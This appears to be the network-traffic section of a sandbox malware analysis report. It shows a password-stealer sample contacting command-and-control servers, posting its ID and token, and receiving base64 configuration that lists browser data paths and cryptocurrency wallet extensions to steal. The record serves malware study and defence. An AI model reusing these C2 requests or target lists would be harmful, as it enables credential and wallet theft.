                                            Jul 2, 2024 08:30:15.249437094 CEST6415880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:15.362103939 CEST6415880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:15.362387896 CEST6415980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:15.367383003 CEST806415977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:15.367454052 CEST6415980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:15.367647886 CEST6415980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:15.367682934 CEST806415877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:15.367733002 CEST6415880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:15.373640060 CEST806415977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:16.054502964 CEST806415977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:16.055077076 CEST6415980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:16.057708979 CEST6415980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:16.057714939 CEST6416080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:16.062504053 CEST806416077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:16.062669039 CEST6416080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:16.062895060 CEST6416080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:16.062958956 CEST806415977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:16.063018084 CEST6415980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:16.067706108 CEST806416077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:16.753737926 CEST806416077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:16.753809929 CEST6416080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:16.862962008 CEST6416080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:16.863327980 CEST6416180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:16.868159056 CEST806416177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:16.868241072 CEST6416180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:16.868489981 CEST6416180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:16.868577957 CEST806416077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:16.868635893 CEST6416080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:16.873368979 CEST806416177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:16.875302076 CEST6416180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:16.878695011 CEST6416280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:16.884341002 CEST806416277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:16.884455919 CEST6416280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:16.884653091 CEST6416280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:16.889488935 CEST806416277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:17.601027966 CEST806416277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:17.601080894 CEST6416280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:17.705863953 CEST6416280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:17.706202984 CEST6416380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:17.710870028 CEST806416277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:17.711050034 CEST6416280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:17.711180925 CEST806416377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:17.711306095 CEST6416380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:17.712006092 CEST6416380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:17.716864109 CEST806416377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:17.719032049 CEST6416380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:17.721514940 CEST6416480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:17.726324081 CEST806416477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:17.726469994 CEST6416480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:17.726552010 CEST6416480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:17.731364965 CEST806416477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:18.417637110 CEST806416477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:18.417757988 CEST6416480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:18.534342051 CEST6416580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:18.534440041 CEST6416480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:18.539366961 CEST806416577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:18.539494038 CEST6416580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:18.539710045 CEST806416477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:18.539717913 CEST6416580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:18.539844036 CEST6416480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:18.544852018 CEST806416577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:19.250102043 CEST806416577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:19.250154018 CEST6416580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:19.253209114 CEST6416580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:19.253500938 CEST6416680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:19.258981943 CEST806416577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:19.259036064 CEST6416580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:19.259046078 CEST806416677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:19.259114981 CEST6416680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:19.259247065 CEST6416680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:19.264070034 CEST806416677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:19.265795946 CEST6416680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:19.378792048 CEST6416780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:19.383730888 CEST806416777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:19.383888960 CEST6416780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:19.384088039 CEST6416780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:19.388875008 CEST806416777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:20.099158049 CEST806416777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:20.099240065 CEST6416780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:20.102722883 CEST6416780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:20.102978945 CEST6416880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:20.107793093 CEST806416877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:20.107913971 CEST6416880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:20.108067989 CEST806416777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:20.108277082 CEST6416880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:20.108277082 CEST6416780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:20.113044024 CEST806416877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:20.799037933 CEST806416877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:20.799110889 CEST6416880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:20.959295034 CEST6416880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:20.959728003 CEST6416980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:20.964416981 CEST806416877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:20.964468002 CEST6416880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:20.964524984 CEST806416977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:20.964580059 CEST6416980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:20.964976072 CEST6416980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:20.969922066 CEST806416977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:21.679464102 CEST806416977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:21.679578066 CEST6416980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:21.686683893 CEST6416980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:21.687088013 CEST6417080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:21.692080021 CEST806417077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:21.692528963 CEST806416977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:21.692650080 CEST6416980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:21.692714930 CEST6417080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:21.693061113 CEST6417080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:21.697813988 CEST806417077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:22.412450075 CEST806417077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:22.412580967 CEST6417080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:22.523250103 CEST6417080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:22.524065018 CEST6417180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:22.528522015 CEST806417077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:22.528917074 CEST806417177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:22.528995991 CEST6417080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:22.529102087 CEST6417180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:22.529403925 CEST6417180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:22.534173012 CEST806417177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:23.230871916 CEST806417177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:23.230961084 CEST6417180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:23.234498978 CEST6417180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:23.234919071 CEST6417280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:23.239603043 CEST806417177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:23.239674091 CEST6417180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:23.239876032 CEST806417277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:23.239969969 CEST6417280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:23.240247011 CEST6417280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:23.245117903 CEST806417277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:23.950916052 CEST806417277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:23.951159954 CEST6417280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:24.065651894 CEST6417280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:24.066375971 CEST6417380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:24.071167946 CEST806417277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:24.071182966 CEST806417377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:24.071232080 CEST6417280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:24.071346045 CEST6417380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:24.071521997 CEST6417380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:24.076437950 CEST806417377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:24.778804064 CEST806417377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:24.778858900 CEST6417380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:24.782473087 CEST6417380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:24.782839060 CEST6417480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:24.787739038 CEST806417477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:24.787763119 CEST806417377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:24.787800074 CEST6417480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:24.787959099 CEST6417380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:24.788163900 CEST6417480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:24.793507099 CEST806417477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:25.501451015 CEST806417477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:25.501610041 CEST6417480192.168.2.477.91.77.82
                                            • 85.28.47.4
                                            • 77.91.77.81
                                            • 77.91.77.82
                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.2.46388085.28.47.4807352C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:26:18.793215990 CEST408OUTPOST /920475a59bac849d.php HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=----CFIEBKEHCAKFCBFIDAAK
                                            Host: 85.28.47.4
                                            Content-Length: 211
                                            Connection: Keep-Alive
                                            Cache-Control: no-cache
                                            Data Raw: 2d 2d 2d 2d 2d 2d 43 46 49 45 42 4b 45 48 43 41 4b 46 43 42 46 49 44 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 44 44 30 46 45 31 37 31 41 41 43 33 33 34 33 34 31 32 31 34 38 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 42 4b 45 48 43 41 4b 46 43 42 46 49 44 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6a 6f 6e 79 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 42 4b 45 48 43 41 4b 46 43 42 46 49 44 41 41 4b 2d 2d 0d 0a
                                            Data Ascii: ------CFIEBKEHCAKFCBFIDAAKContent-Disposition: form-data; name="hwid"8DD0FE171AAC3343412148------CFIEBKEHCAKFCBFIDAAKContent-Disposition: form-data; name="build"jony------CFIEBKEHCAKFCBFIDAAK--
                                            Jul 2, 2024 08:26:19.531388044 CEST384INHTTP/1.1 200 OK
                                            Date: Tue, 02 Jul 2024 06:26:19 GMT
                                            Server: Apache/2.4.41 (Ubuntu)
                                            Vary: Accept-Encoding
                                            Content-Length: 156
                                            Keep-Alive: timeout=5, max=100
                                            Connection: Keep-Alive
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 4e 7a 59 7a 5a 6d 45 7a 5a 54 6c 68 4d 47 51 31 4d 32 4a 6d 59 54 49 35 4f 47 4e 68 4f 47 4e 6a 59 32 49 78 4d 57 55 35 4e 6d 52 6b 59 57 45 34 5a 6a 4e 6c 4d 6a 64 6a 4e 57 46 6b 4d 6d 59 77 59 6a 42 69 59 6a 67 7a 4f 44 4d 34 4f 44 5a 6a 5a 6a 63 34 5a 6a 6c 69 5a 54 4d 35 5a 54 67 30 66 47 70 69 5a 48 52 68 61 57 70 76 64 6d 64 38 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 3d
                                            Data Ascii: NzYzZmEzZTlhMGQ1M2JmYTI5OGNhOGNjY2IxMWU5NmRkYWE4ZjNlMjdjNWFkMmYwYjBiYjgzODM4ODZjZjc4ZjliZTM5ZTg0fGpiZHRhaWpvdmd8ZWltZWhydnpvZC5maWxlfDB8MHwxfDF8MXwxfDF8MXw=
                                            Jul 2, 2024 08:26:19.532970905 CEST465OUTPOST /920475a59bac849d.php HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=----FHDAFIIDAKJDGDHIDAKJ
                                            Host: 85.28.47.4
                                            Content-Length: 268
                                            Connection: Keep-Alive
                                            Cache-Control: no-cache
                                            Data Raw: 2d 2d 2d 2d 2d 2d 46 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 33 66 61 33 65 39 61 30 64 35 33 62 66 61 32 39 38 63 61 38 63 63 63 62 31 31 65 39 36 64 64 61 61 38 66 33 65 32 37 63 35 61 64 32 66 30 62 30 62 62 38 33 38 33 38 38 36 63 66 37 38 66 39 62 65 33 39 65 38 34 0d 0a 2d 2d 2d 2d 2d 2d 46 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 46 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 2d 2d 0d 0a
                                            Data Ascii: ------FHDAFIIDAKJDGDHIDAKJContent-Disposition: form-data; name="token"763fa3e9a0d53bfa298ca8cccb11e96ddaa8f3e27c5ad2f0b0bb8383886cf78f9be39e84------FHDAFIIDAKJDGDHIDAKJContent-Disposition: form-data; name="message"browsers------FHDAFIIDAKJDGDHIDAKJ--
                                            Jul 2, 2024 08:26:19.711322069 CEST1236INHTTP/1.1 200 OK
                                            Date: Tue, 02 Jul 2024 06:26:19 GMT
                                            Server: Apache/2.4.41 (Ubuntu)
                                            Vary: Accept-Encoding
                                            Content-Length: 1520
                                            Keep-Alive: timeout=5, max=99
                                            Connection: Keep-Alive
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED]
                                            Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3Nl
                                            Jul 2, 2024 08:26:19.711338997 CEST512INData Raw: 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32
                                            Data Ascii: clxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRml
                                            Jul 2, 2024 08:26:19.712933064 CEST464OUTPOST /920475a59bac849d.php HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=----GDGIJECGDGCBKECAKFBG
                                            Host: 85.28.47.4
                                            Content-Length: 267
                                            Connection: Keep-Alive
                                            Cache-Control: no-cache
                                            Data Raw: 2d 2d 2d 2d 2d 2d 47 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 33 66 61 33 65 39 61 30 64 35 33 62 66 61 32 39 38 63 61 38 63 63 63 62 31 31 65 39 36 64 64 61 61 38 66 33 65 32 37 63 35 61 64 32 66 30 62 30 62 62 38 33 38 33 38 38 36 63 66 37 38 66 39 62 65 33 39 65 38 34 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 2d 2d 0d 0a
                                            Data Ascii: ------GDGIJECGDGCBKECAKFBGContent-Disposition: form-data; name="token"763fa3e9a0d53bfa298ca8cccb11e96ddaa8f3e27c5ad2f0b0bb8383886cf78f9be39e84------GDGIJECGDGCBKECAKFBGContent-Disposition: form-data; name="message"plugins------GDGIJECGDGCBKECAKFBG--
                                            Jul 2, 2024 08:26:19.892678022 CEST1236INHTTP/1.1 200 OK
                                            Date: Tue, 02 Jul 2024 06:26:19 GMT
                                            Server: Apache/2.4.41 (Ubuntu)
                                            Vary: Accept-Encoding
                                            Content-Length: 5416
                                            Keep-Alive: timeout=5, max=98
                                            Connection: Keep-Alive
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED]
                                            Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
                                            Jul 2, 2024 08:26:19.892702103 CEST1236INData Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46
                                            Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29
                                            Jul 2, 2024 08:26:19.892714024 CEST1236INData Raw: 66 47 52 75 5a 32 31 73 59 6d 78 6a 62 32 52 6d 62 32 4a 77 5a 48 42 6c 59 32 46 68 5a 47 64 6d 59 6d 4e 6e 5a 32 5a 71 5a 6d 35 74 66 44 46 38 4d 48 77 77 66 45 74 6c 5a 58 42 6c 63 69 42 58 59 57 78 73 5a 58 52 38 62 48 42 70 62 47 4a 75 61 57
